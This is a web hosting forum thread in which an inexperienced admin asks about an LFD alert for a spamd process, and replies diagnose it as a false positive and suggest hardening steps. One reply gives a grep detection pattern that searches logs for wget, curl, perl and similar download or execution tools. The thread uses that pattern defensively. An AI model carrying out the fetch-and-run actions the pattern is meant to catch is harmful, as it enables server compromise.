Results 1 to 25 of 25
  1. #1
    Join Date
    Aug 2009
    Posts
    43

    Suspicious Process Running under user in my host.. What should I do?

    Suspicious Process Running under user in my host
    Time: Fri Sep 11 11:34:27 2009 +0700
    PID: 20893
    Account: belidonk
    Uptime: 1146 seconds


    Executable:

    /usr/local/bin/perl


    Command Line (often faked in exploits):

    spamd child


    Network connections by the process (if any):

    tcp: 127.0.0.1:783 -> 0.0.0.0:0
    tcp: 127.0.0.1:783 -> 127.0.0.1:33537
    udp: 202.43.169.146:40156 -> 202.43.169.146:53


    Files open by the process (if any):

    /dev/null
    /dev/null
    /dev/null
    /usr/bin/spamd
    /usr/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/VBounce.pm
    /tmp/.spamassassin20893VJRkFEtmp
    /tmp/.spamassassin208932TMd9Ktmp


    Memory maps by the process (if any):

    005aa000-0069e000 r-xp 00000000 fd:00 26804459 /lib/libdb-4.3.so
    0069e000-006a1000 rwxp 000f3000 fd:00 26804459 /lib/libdb-4.3.so
    0089b000-0089d000 r-xp 00000000 fd:00 26805617 /lib/libutil-2.5.so
    0089d000-0089e000 r-xp 00001000 fd:00 26805617 /lib/libutil-2.5.so
    0089e000-0089f000 rwxp 00002000 fd:00 26805617 /lib/libutil-2.5.so
    00b3e000-00b58000 r-xp 00000000 fd:00 26805086 /lib/ld-2.5.so
    00b58000-00b59000 r-xp 00019000 fd:00 26805086 /lib/ld-2.5.so
    00b59000-00b5a000 rwxp 0001a000 fd:00 26805086 /lib/ld-2.5.so
    00b5c000-00c9a000 r-xp 00000000 fd:00 26805104 /lib/libc-2.5.so
    00c9a000-00c9c000 r-xp 0013e000 fd:00 26805104 /lib/libc-2.5.so
    00c9c000-00c9d000 rwxp 00140000 fd:00 26805104 /lib/libc-2.5.so
    00c9d000-00ca0000 rwxp 00c9d000 00:00 0
    00ca2000-00ca4000 r-xp 00000000 fd:00 26805105 /lib/libdl-2.5.so
    00ca4000-00ca5000 r-xp 00001000 fd:00 26805105 /lib/libdl-2.5.so
    00ca5000-00ca6000 rwxp 00002000 fd:00 26805105 /lib/libdl-2.5.so
    00ca8000-00cbb000 r-xp 00000000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbb000-00cbc000 r-xp 00012000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbc000-00cbd000 rwxp 00013000 fd:00 26805566 /lib/libpthread-2.5.so
    00cbd000-00cbf000 rwxp 00cbd000 00:00 0
    00cc1000-00ce6000 r-xp 00000000 fd:00 26805573 /lib/libm-2.5.so
    00ce6000-00ce7000 r-xp 00024000 fd:00 26805573 /lib/libm-2.5.so
    00ce7000-00ce8000 rwxp 00025000 fd:00 26805573 /lib/libm-2.5.so
    00d61000-00d68000 r-xp 00000000 fd:00 26805604 /lib/librt-2.5.so
    00d68000-00d69000 r-xp 00006000 fd:00 26805604 /lib/librt-2.5.so
    00d69000-00d6a000 rwxp 00007000 fd:00 26805604 /lib/librt-2.5.so
    00d6c000-00d7f000 r-xp 00000000 fd:00 26805599 /lib/libnsl-2.5.so
    00d7f000-00d80000 r-xp 00012000 fd:00 26805599 /lib/libnsl-2.5.so
    00d80000-00d81000 rwxp 00013000 fd:00 26805599 /lib/libnsl-2.5.so
    00d81000-00d83000 rwxp 00d81000 00:00 0
    00d85000-00d8e000 r-xp 00000000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8e000-00d8f000 r-xp 00008000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d8f000-00d90000 rwxp 00009000 fd:00 26805593 /lib/libcrypt-2.5.so
    00d90000-00db7000 rwxp 00d90000 00:00 0
    08048000-08126000 r-xp 00000000 fd:00 59322714 /usr/local/bin/perl
    08126000-0812a000 rwxp 000dd000 fd:00 59322714 /usr/local/bin/perl
    0812a000-0812c000 rwxp 0812a000 00:00 0
    0835f000-0a2cc000 rwxp 0835f000 00:00 0 [heap]
    b76ee000-b77af000 rwxp b76ee000 00:00 0
    b7870000-b7931000 rwxp b7d4c000 00:00 0
    b7931000-b79f2000 rwxp b7931000 00:00 0
    b79f2000-b7ab3000 rwxp b7ea2000 00:00 0
    b7b4b000-b7d4c000 rwxp b7b4b000 00:00 0
    b7df7000-b7ea2000 rwxp b7df7000 00:00 0
    b7f4d000-b7f52000 r-xp 00000000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f52000-b7f53000 rwxp 00004000 fd:00 60032680 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/NetAddr/IP/Util/Util.so
    b7f53000-b7f58000 r-xp 00000000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f58000-b7f59000 rwxp 00004000 fd:00 59908663 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/version/vxs/vxs.so
    b7f59000-b7f63000 r-xp 00000000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f63000-b7f64000 rwxp 00009000 fd:00 59871844 /usr/local/lib/perl5/5.8.8/i686-linux/auto/DB_File/DB_File.so
    b7f64000-b7f6d000 r-xp 00000000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6d000-b7f6e000 r-xp 00008000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f6e000-b7f6f000 rwxp 00009000 fd:00 26804490 /lib/libnss_files-2.5.so
    b7f71000-b7f74000 r-xp 00000000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f74000-b7f75000 rwxp 00002000 fd:00 59906292 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/BSD/Resource/Resource.so
    b7f75000-b7f79000 r-xp 00000000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f79000-b7f7a000 rwxp 00003000 fd:00 60032556 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Digest/SHA1/SHA1.so
    b7f7a000-b7f7d000 r-xp 00000000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7d000-b7f7e000 rwxp 00002000 fd:00 59871555 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Syslog/Syslog.so
    b7f7e000-b7f83000 r-xp 00000000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f83000-b7f84000 rwxp 00004000 fd:00 59871947 /usr/local/lib/perl5/5.8.8/i686-linux/auto/List/Util/Util.so
    b7f84000-b7f86000 r-xp 00000000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f86000-b7f87000 rwxp 00001000 fd:00 59872383 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Cwd/Cwd.so
    b7f87000-b7f88000 r-xp 00000000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f88000-b7f89000 rwxp 00001000 fd:00 60032568 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Net/DNS/DNS.so
    b7f89000-b7f92000 r-xp 00000000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f92000-b7f93000 rwxp 00008000 fd:00 60031986 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/HTML/Parser/Parser.so
    b7f93000-b7f97000 r-xp 00000000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f97000-b7f98000 rwxp 00003000 fd:00 59872354 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Time/HiRes/HiRes.so
    b7f98000-b7f9b000 r-xp 00000000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9b000-b7f9c000 rwxp 00002000 fd:00 59871569 /usr/local/lib/perl5/5.8.8/i686-linux/auto/File/Glob/Glob.so
    b7f9c000-b7f9e000 r-xp 00000000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9e000-b7f9f000 rwxp 00001000 fd:00 59871799 /usr/local/lib/perl5/5.8.8/i686-linux/auto/MIME/Base64/Base64.so
    b7f9f000-b7fb5000 r-xp 00000000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb5000-b7fb6000 rwxp 00015000 fd:00 59871742 /usr/local/lib/perl5/5.8.8/i686-linux/auto/POSIX/POSIX.so
    b7fb6000-b7fb9000 r-xp 00000000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fb9000-b7fba000 rwxp 00002000 fd:00 59871596 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Fcntl/Fcntl.so
    b7fba000-b7fbe000 r-xp 00000000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbe000-b7fbf000 rwxp 00003000 fd:00 60164505 /usr/local/lib/perl5/site_perl/5.8.8/i686-linux/auto/Socket6/Socket6.so
    b7fbf000-b7fc2000 rwxp b7fbf000 00:00 0
    b7fc2000-b7fc3000 r-xp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc3000-b7fc4000 rwxp 00000000 fd:00 59871558 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Sys/Hostname/Hostname.so
    b7fc4000-b7fc7000 r-xp 00000000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc7000-b7fc8000 rwxp 00002000 fd:00 59872379 /usr/local/lib/perl5/5.8.8/i686-linux/auto/IO/IO.so
    b7fc8000-b7fcc000 r-xp 00000000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcc000-b7fcd000 rwxp 00003000 fd:00 59871524 /usr/local/lib/perl5/5.8.8/i686-linux/auto/Socket/Socket.so
    b7fcd000-b7fce000 r-xp b7fcd000 00:00 0 [vdso]
    bfba5000-bfbd3000 rw-p bffd1000 00:00 0 [stack]

    Guys, any idea what should I do ? I have killed the PID..
    Thank you

  2. #2
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    I wouldn't suggest killing processes you don't know anything about. Research the process and then decide whether it is harmful or not.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  3. #3
    Join Date
    Aug 2009
    Posts
    43
    FYI, the user (belidonk) has been reported and logged using a large number of resources in my host. When I confirmed it to the account owner, he said, he is doing nothing. So I assumed that there is something wrong with this user. maybe get attack by someone or trojan or anything else that i might be not know. Because their main page index.php get changed by someone and cannot load correctly (he said "I never change the index.php.. then who did it ? "). how to avoid this happened again ?

    thanks

  4. #4
    looks like some perl hidden script. Have you gone through /tmp partition ? Might be some sort of perl udp or tcp scripts running.
    www.24x7servermanagement.com
    Server Management, Server Security, Server Monitoring.
    India's Leading Managed Service Provider !! Skype: techs24x7

  5. #5
    Join Date
    Aug 2009
    Posts
    43
    how do I check it ? this is my /tmp directory file:
    ./ sess_34a7c0f1ef1bdd25a6e455a44e5912a7 sess_6c50ae8f68334982c015a28bc8616b0c sess_b434340698a515c0325ed437207aa65f
    ../ sess_34f25b2fb8e3aac7d385df4eaa9d30ec sess_6d078054c2d7afd274c5b6d5468e6e44 sess_baaf49fa46fd3c5c42ea6a7891e3b530
    aquota.user* sess_36c96c180280a43529c95533c3e59ba6 sess_6d571ab46642ab39b797ebe37d85633b sess_baed918ee6b1c7b23c58f59a8221f0aa
    eaccelerator/ sess_3933f6854dd3bfadce371389786aa9f6 sess_6de0879e67806e44e51f0fed8ffab7c0 sess_bb6c06dd5b9b68e913c4c701b4a62bc4
    .ftpquota sess_3ee555d1123049951f86cd2ef600ab6c sess_726eda76a4e554b18611782a38dfaaa3 sess_bbc57d5e1fbeb692c6f332d376e1918f
    .ICE-unix/ sess_3f9cdf05c01e0d2b066ffed8c6be23b4 sess_7558c8d3e5fdb060e1c482c1b0a9d4f2 sess_be8c1cf42e51099b271d82d010f5ed70
    lost+found/ sess_3fca2ac9e59f769c8acffd74dba418a6 sess_763a027cdc44c5dfe8477f17e0aae3cb sess_bef5ed6a3b892436d812d20bfcceed1f
    magento/ sess_40f719b447c35cb2a4bbeda6e301dfe6 sess_76a65e26df35a91211df7cb6e15e5eb4 sess_cc14e72096d9e6ccbaaa2c890a80aee5
    mysql.sock@ sess_4542c1a0ddb04db3dfa16e906cfaf6a6 sess_7a2400244a14f32152448051d768cc7e sess_d2cae73088f36ee6c65cd383528b1b63
    sess_0004190eb64b38a64eaf9362581ddbc4 sess_485e288d5e0830a43633dc59a0765e97 sess_7d5b4e1507ec6e1dcd0092fcf841b76c sess_da1b92360d746c38a2819f83316390a8
    sess_0411e281e0c6c1fdde85e688351fec24 sess_4de98c80929502a2ca5e41c1d2c08ed1 sess_834ae75e49f694b105a553ccc94eb8e1 sess_e027443070e95a692dfc9fb297121d54
    sess_05ca1505ef5d49ecba81b7ed2c01c746 sess_4e07b6fca44416f36a903e46d86a2fcf sess_83d709182a7b6324681a8d77a2ad1aae sess_e33c2d687071a2f71d26c0f78c04fb54
    sess_0652341e1b32a08cbb82ec1977351b7c sess_4ea85373388e404f23ef4ee6318eb8af sess_862a315245c6961d3e5baf4b8b831bd7 sess_e3cb89fa4da71f0f0d887048dee06b2a
    sess_0a4f15193be207987dbfac61db6af4e4 sess_51ec5ffcd6edd7a9fa29db7c6496cf39 sess_8778a0093f45d39a6c04107006d437fd sess_e5f55b2687bc2fc77a1ce0073684a7ad
    sess_0c277461a39d5c9af7419d4f5a0570d5 sess_52d03e7c809be9f4dce4c0e632ceac35 sess_87d38230dd1e31994029aa90b53b80ef sess_e683bba7a4b2796cc137738f4030bef2
    sess_0f818387334ee2d4a09753db74e56d77 sess_54a3df8eb051f811021ec470a7d1a68c sess_8e2ae714880e12f112bb3c9105c032a3 sess_e809faadd61b4ac28a797ad453d083e7
    sess_16681bfa71946a90630e18938cc54beb sess_5528e14550a1664d1808804e93f5711c sess_911faeac150401a326d8e3030ffa6d73 sess_ea8bbe0982fa02622b88b1a38d042573
    sess_18eae94f67bfa5fb083929c148402ff0 sess_560dade8c165201562a4e70558fc36c2 sess_97c0a55252ff0254bd5e6b971cd025fb sess_ed3110e43f7e2547e371cc23fd4ab248
    sess_1a98ba045f7a47d3d899750310717337 sess_57489107e5d135f7a7d7741008a3ca18 sess_9d44f778040cb5d299296263682e8c36 sess_eed780d854e8d81908840e30aa7a14f5
    sess_1c3ea3cdccf73ae6756540910c6d6576 sess_5939302be1a6dac364c6a2c130056e89 sess_9d6a751819858bfa128f0f9f857f45c8 sess_eeee4b7b335cec45cc886db8a2937930
    sess_1c5528334e4466c5be9016f23e7e13c8 sess_5a294933a9b8c40e1a8089fc5f96f609 sess_a3d9479d82e4976e08000bc31032aeb7 sess_f1bf4a9b09c788eec9fecbfacdf04611
    sess_1d3c6fad43b4f4d4a81c28c691b5b08d sess_5af3f35e6596df9cbc62379976c41f3f sess_a52838e3d6128f7d921c9a04a971a3f5 sess_f9918d8a5d6202a8bfe4399ddee71a54
    sess_1d5c1d38e282c8352ff84d0be441f43a sess_5cdad968000d602ab38c51d181c28a8b sess_ae91f891e41daec731f6ca574b5a1001 sess_f9cfd9619fca037b6fa78d97053b1517
    sess_2589f8660e314efc68b2960ebc6e6333 sess_5dae9429762c09a3c77467faf0c98b65 sess_afb048d26a4a03c818dbd92257ce98b5 sess_fb0b3ac04acc4af84d1665b1a51e2c66
    sess_2c5e746502114d87a8814c159688807b sess_61f6dcfbed52a4bd0e497d5f62178dc3 sess_b0e2fb36bc0cde124833c9adb0e93db8 .s.PGSQL.5432=
    sess_2cdbaf686a823bea446aff7897500173 sess_64448e80d90a19c8a2d903f82a803fd3 sess_b17203eaf1c6f5228afd9e122ce4c9b1 .s.PGSQL.5432.lock
    sess_2f3b60d24657679f9b0b2323f93604ee sess_67d6c241c3bfa747010821698ee8ba63 sess_b177a876f2eb001c17a6f185e81f1087

  6. #6
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    The process running is spamd which is the SpamAssassin service. It has nothing to do with the user since it can only be enabled by the server admin.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  7. #7
    looks fine no problem with /tmp
    www.24x7servermanagement.com
    Server Management, Server Security, Server Monitoring.
    India's Leading Managed Service Provider !! Skype: techs24x7

  8. #8
    Join Date
    Aug 2009
    Posts
    43
    don't you think this is strange..
    when i do a ps to see all process for each user in my host.
    only user belidonk shows something different.

    Here is just a couple of accounts on my host. But I do it for all accounts, with assumption all account are using pop3 right now, webmail, have been access by internet users, .etc.
    root@fire [/tmp]# ps -a -u o****
    PID TTY TIME CMD
    667 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u belidonk
    PID TTY TIME CMD
    829 pts/0 00:00:00 ps
    15224 ? 00:00:04 imapd
    26558 ? 00:00:00 pop3d
    71238 ? 00:00:00 gam_server
    root@fire [/tmp]# ps -a -u b****
    PID TTY TIME CMD
    844 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u a******
    PID TTY TIME CMD
    933 pts/0 00:00:00 ps

    Why in belidonk shows gam_server, pop3d, imapd ? belidonk user told me that he just run an usual php script.. nothing to do with gam_server, etc.. please some advice ?

  9. #9
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Do some research on these services, you'll notice they are typical services for any website. This is not strange and nothing is out of the ordinary. You, like most of us, have received a false alarm from LFD.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  10. #10
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    You need to edit csf.pignore to filter out legitimate processes otherwise any user process that exceeds the time you have setup will cause LFD to flag the process as suspicious .

    If you want to ignore them you'll need to add something like the following to csf.pignore and then restart lfd:

    cmd : spamd child

    Above is one of the method used although I wont suggest it . As they're not always false-positives.

    Search through /usr/local/apache/domlogs/ should help you find out if there were any hack attempts . If any vulnerable scripts found , I'd suggest chmodding that to 000 and chowing it to root so it wont run .

    You should also go for php securing by applying suhosin . You might as well run the /scripts/securetmp (for cpanel servers) script just for security .

    I would advice to hire a professional to fix this for you and also to harden your server's security. You should manually examine /tmp to see if there are any vulnerable scripts uploaded .
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  11. #11
    Join Date
    Aug 2009
    Posts
    43
    hmm.. maybe that is right.. I should hardening my server. Can you give me a step by step to applying suhosin or phpsuexec to my existing client. Because till now, i haven't set it. I read a couple of article related to it.. They said by using phpsuexec or suhosin, my client will have problem with mail setting permission, and etc.. is it true ? Please give me advice for hardening my server (some links, articles, files, or anything but in step by step. because i'm new in this area)?

    hmm.. for hiring a professional, i think that's a good idea. But for now, i want to do it by myself so i can be as good as a professional too
    thanks for the advices.

  12. #12
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Well since you appear to have already bypassed the basic steps for securing your server as well as killed a system process without knowing what it is I would suggest leaving the security to people who know what they are doing to avoid a "HELP ME" thread in the near distant future.

    If you're not willing to shell out a couple dollars to ensure your client's security then my advice is find a different line of work where people don't put their potential livelyhood in your hands.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  13. #13
    Join Date
    Aug 2009
    Posts
    43
    Hi,
    I get this on my /usr/local/apache/domlogs/
    belidonk/
    |-- ftp.domainname.com-ftp_log
    |-- domainname.com
    `-- domainname.com-ssl_log
    belidonk-imapbytes_log
    belidonk-imapbytes_log.offset
    belidonk-popbytes_log
    belidonk-popbytes_log.offset

    which one should I check ? and how to mark it as a hack attempt?

  14. #14
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Hire a professional. If you don't know which logs to even look in then chances are you don't know what you are looking for nor will you know how to properly fix the issue.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  15. #15
    Join Date
    Aug 2009
    Posts
    43
    @JWeb2:
    sorry no offense, JWeb2.. But I think this is the forum created for..
    to help each others and post related information to the questions.
    If everything can be answered with this statement "Hire a Pro".. Then, what a pro does if he/she get stuck in one issue ?

    thank you.

  16. #16
    Join Date
    Feb 2007
    Location
    Florida
    Posts
    1,932
    Yes, but when you start to kill system processes without any knowledge and target a user for checking their e-mail then it's time to call a pro to save yourself a lot more time and money in the future.
    -Joe @ Secure Dragon LLC.
    + OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
    + Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas

  17. #17
    Join Date
    Aug 2009
    Posts
    43
    @JWeb2:
    Okay.. thank for the input. appreciate that.

  18. #18
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Quote Originally Posted by queen_leonia View Post
    Hi,
    I get this on my /usr/local/apache/domlogs/
    belidonk/
    |-- ftp.domainname.com-ftp_log
    |-- domainname.com
    `-- domainname.com-ssl_log
    belidonk-imapbytes_log
    belidonk-imapbytes_log.offset
    belidonk-popbytes_log
    belidonk-popbytes_log.offset

    which one should I check ? and how to mark it as a hack attempt?

    You can check the file domainname.com (that should be your domain name ) . Well, to know if there were any hacking attempts , you should check manually and be able to find out . This is a simple script that can be used to see if the entries exist .

    find /usr/local/apache/domlogs/your_domain_name -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)' {} \;

    You can enable suhosin from cpanel's easyapache ie /scripts/easyapache ( never run the script if you haven't before ) .

    If you use suhosin in cpanel's easyapache you might run into issues where you can not post a large amount of variables to a php script. But you may easily solve this by tweaking the suhosin variables in php.ini .
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  19. #19
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    You can google for "Basic Linux Server Security" which should provide you with good links on how to secure linux , even with step by step details .
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  20. #20
    Join Date
    Aug 2009
    Posts
    43
    @logicsupport:
    thank for the information and the answer.

  21. #21
    Join Date
    Aug 2009
    Posts
    43
    Here is what I found in CFS forum..
    Process Tracking and csf.pignore

    --------------------------------------------------------------------------------

    1. If you're seeing spamd being reported after the latest update and want to ignore it, the following can be added to csf.pignore:

    cmd: spamd child

    Then restart lfd.

    2. If you're seeing awstats.pl being reported after the latest update and want to ignore it, the following can be added to csf.pignore:

    pcmd:.*/usr/local/cpanel/3rdparty/bin/awstats\.pl.*
    pcmd:.*/usr/local/cpanel/base/awstats\.pl.*

    Then restart lfd.

    3. If you're seeing (deleted) processes being reported then you need to read the information provided in csf.conf for the PT_DELETED option. Currently this reads:

    Quote:
    # lfd will report processes, even if they're listed in csf.pignore, if they're
    # tagged as (deleted) by Linux. This information is provided in Linux under
    # /proc/PID/exe. A (deleted) process is one that is running a binary that has
    # the inode for the file removed from the file system directory. This usually
    # happens when the binary has been replaced due to an upgrade for it by the OS
    # vendor or another third party (e.g. cPanel). You need to investigate whether
    # this is indeed the case to be sure that the original binary has not been
    # replaced by a rootkit or is running an exploit.
    #
    # To stop lfd reporting such process you need to restart the daemon to which it
    # belongs and therefore run the process using the replacement binary (presuming
    # one exists). This will normally mean running the associated startup script in
    # /etc/init.d/
    #
    # If you don't want lfd to report deleted binary processes, set to 0
    PT_DELETED = "1"

    If, for example, you still want to ignore pure-ftpd deleted executable reports, the following can be added to csf.pignore:

    pexe:/usr/sbin/pure-ftpd.*

    or, if you want to ignore deleted executable processes, set the following in csf.conf:

    PT_DELETED = "0"

    In either case, restart lfd after making any changes.

    However, be aware that deleted executable file names will become more corrupted the longer they are left running, so even the pure-ftpd part of the name may no longer match over time. This is a symptom of the Linux file system and the way Linux handles processes that are running executables that no longer exist at the inode they originally ran from, this is simply what lfd is reporting.


    Please note that investigating Process Tracking reports is the responsibility of the server administrator and going into the detail of such work is beyond the scope of this forum. lfd simply reports the information it finds for a process within the /proc/PID/ file system.

    Source: http://forum.configserver.com/showthread.php?t=2059

    But I haven't done it, because I think maybe its not the real solution.

  22. #22
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Quote Originally Posted by logicsupport View Post
    You need to edit csf.pignore to filter out legitimate processes otherwise any user process that exceeds the time you have setup will cause LFD to flag the process as suspicious .

    If you want to ignore them you'll need to add something like the following to csf.pignore and then restart lfd:

    cmd : spamd child

    Above is one of the method used although I wont suggest it . As they're not always false-positives.

    .
    lfd simply reports the information it finds for a process, we need to put in extra effort to actually find out if its false positive or not .
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  23. #23
    Join Date
    Aug 2009
    Posts
    43
    Quote Originally Posted by queen_leonia View Post
    don't you think this is strange..
    when i do a ps to see all process for each user in my host.
    only user belidonk shows something different.

    Here is just a couple of accounts on my host. But I do it for all accounts, with assumption all account are using pop3 right now, webmail, have been access by internet users, .etc.
    root@fire [/tmp]# ps -a -u o****
    PID TTY TIME CMD
    667 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u belidonk
    PID TTY TIME CMD
    829 pts/0 00:00:00 ps
    15224 ? 00:00:04 imapd
    26558 ? 00:00:00 pop3d
    71238 ? 00:00:00 gam_server
    root@fire [/tmp]# ps -a -u b****
    PID TTY TIME CMD
    844 pts/0 00:00:00 ps
    root@fire [/tmp]# ps -a -u a******
    PID TTY TIME CMD
    933 pts/0 00:00:00 ps

    Why in belidonk shows gam_server, pop3d, imapd ? belidonk user told me that he just run an usual php script.. nothing to do with gam_server, etc.. please some advice ?
    for the strange processes which are owned by belidonk, I try to uninstall the gam_server from WHM (because my clients don't use it too) and it works. The process show only the ps when i do 'ps -a -u belidonk' the same as other accounts.

    Thank you

  24. #24
    Join Date
    Jul 2009
    Location
    Manila
    Posts
    301
    Quote Originally Posted by queen_leonia View Post
    @JWeb2:
    sorry no offense, JWeb2.. But I think this is the forum created for..
    to help each others and post related information to the questions.
    If everything can be answered with this statement "Hire a Pro".. Then, what a pro does if he/she get stuck in one issue ?

    thank you.
    Yes it may be true that this forum is created to help other people but do not expect that we can do all the stuff for you. If you don't even know where to start then you will get more troubles in the future.

    A pro might ask something here for assistance if he's stuck but at least he knows basic management. No offense but you look like you don't even know where to start.

    If you start troubleshooting your server on your own without really understanding what you are doing and why you need to do it then you will for sure run into more problems in the future.

  25. #25
    Quote Originally Posted by queen_leonia View Post
    Suspicious Process Running under user in my host
    Time: Fri Sep 11 11:34:27 2009 +0700
    PID: 20893
    Account: belidonk
    Uptime: 1146 seconds


    Executable:

    /usr/local/bin/perl


    Command Line (often faked in exploits):

    spamd child


    Network connections by the process (if any):

    tcp: 127.0.0.1:783 -> 0.0.0.0:0
    tcp: 127.0.0.1:783 -> 127.0.0.1:33537
    udp: 202.43.169.146:40156 -> 202.43.169.146:53


    Files open by the process (if any):

    /dev/null
    /dev/null
    /dev/null
    /usr/bin/spamd
    /usr/lib/perl5/site_perl/5.8.8/Mail/SpamAssassin/Plugin/VBounce.pm
    /tmp/.spamassassin20893VJRkFEtmp
    /tmp/.spamassassin208932TMd9Ktmp


    Memory maps by the process (if any):

    005aa000-0069e000 r-xp 00000000 fd:00 26804459 /lib/libdb-4.3.so
    0069e000-006a1000 rwxp 000f3000 fd:00 26804459 /lib/libdb-4.3.so
    0089b000-0089d000 r-xp 00000000 fd:00 26805617 /lib/libutil-2.5.so
    0089d000-0089e000 r-xp 00001000 fd:00 26805617 /lib/libutil-2.5.so
    0089e000-0089f000 rwxp 00002000 fd:00 26805617 /lib/libutil-2.5.so
    00b3e000-00b58000 r-xp 00000000 fd:00 26805086 /lib/ld-2.5.so
    00b58000-00b59000 r-xp 00019000 fd:00 26805086 /lib/ld-2.5.so
    00b59000-00b5a000 rwxp 0001a000 fd:00 26805086 /lib/ld-2.5.so
    00b5c000-00c9a000 r-xp 00000000 fd:00 26805104 /lib/libc-2.5.so
    00c9a000-00c9c000 r-xp 0013e000 fd:00 26805104 /lib/libc-2.5.so
    00c9c000-00c9d000 rwxp 00140000 fd:00 26805104 /lib/libc-2.5.so
    00c9d000-00ca0000 rwxp 00c9d000 00:00 0
    00ca2000-00ca4000 r-xp 00000000 fd:00 26805105 /lib/libdl-2.5.so
    00ca4000-00ca5000 r-xp 00001000 fd:00 26805105 /lib/libdl-2.5.so
    00ca5000-00ca6000 rwxp 00002000 fd:00 26805105 /lib/libdl-2.5.so
    00ca8000-00cbb000 r-xp 00000000 fd:00 26805566 /lib/libpthread-2.5.so
